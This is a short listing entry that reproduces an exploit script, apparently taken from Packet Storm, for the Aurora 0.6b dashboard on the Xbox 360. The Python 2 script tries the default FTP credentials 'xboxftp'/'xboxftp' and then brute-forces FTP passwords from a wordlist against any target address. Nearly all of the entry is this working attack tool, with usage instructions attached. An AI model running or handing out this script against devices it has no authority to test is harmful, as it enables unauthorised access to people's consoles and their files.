  24. XBOX 360 Aurora version 0.6b default credential FTP bruteforcing script. # Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce # Date: 20/12/2017 # Exploit Author: Daniel Godoy # Vendor Homepage: http://phoenix.xboxunity.net/#/news # Tested on: XBOX 360 # GREETZ: Iker Legorreta, #RemoteExecution Team #!/usr/bin/env python # -*- coding:utf-8 -*- __author__ = 'Daniel Godoy' import argparse import sys from ftplib import FTP info = ''' XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n Usage: ./xbox_ftp_brute_forcer.py [options]\n Options: -t, --target <hostname/ip> | Target\n -u, --user <user> | User\n -w, --wordlist <filename> | Wordlist\n -h, --help <help> | print help\n Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt ''' def help(): print info sys.exit(0) def check_default_login(target): try: ftp = FTP(target) ftp.login('xboxftp', 'xboxftp') ftp.quit() print "\n[+] Default login is open." print "\n[+] Username : xboxftp" print "\n[+] Password : xboxftp\n" ftp.quit() except: pass def ftp_login(target, username, password): try: ftp = FTP(target) ftp.login(username, password) ftp.quit() print "\n[*] Credentials have found." print "\n[*] Username : {}".format(username) print "\n[*] Password : {}".format(password) return True except: return False def brute_force(target, username, wordlist): try: wordlist = open(wordlist, "r") words = wordlist.readlines() for word in words: word = word.strip() if ftp_login(target, username, word): break except: print "\n[-] There is no such wordlist file. \n" sys.exit(0) parser = argparse.ArgumentParser() parser.add_argument("-t", "--target") parser.add_argument("-u", "--username") parser.add_argument("-w", "--wordlist") args = parser.parse_args() if not args.target or not args.username or not args.wordlist: help() sys.exit(0) target = args.target username = args.username wordlist = args.wordlist brute_force(target, username, wordlist) check_default_login(target) print "\n[-] Brute force finished. \n" Source: https://packetstormsecurity.com/files/145532/XBOX-360-Aurora-0.6b-Default-Credentials-FTP-Bruteforcer.html
×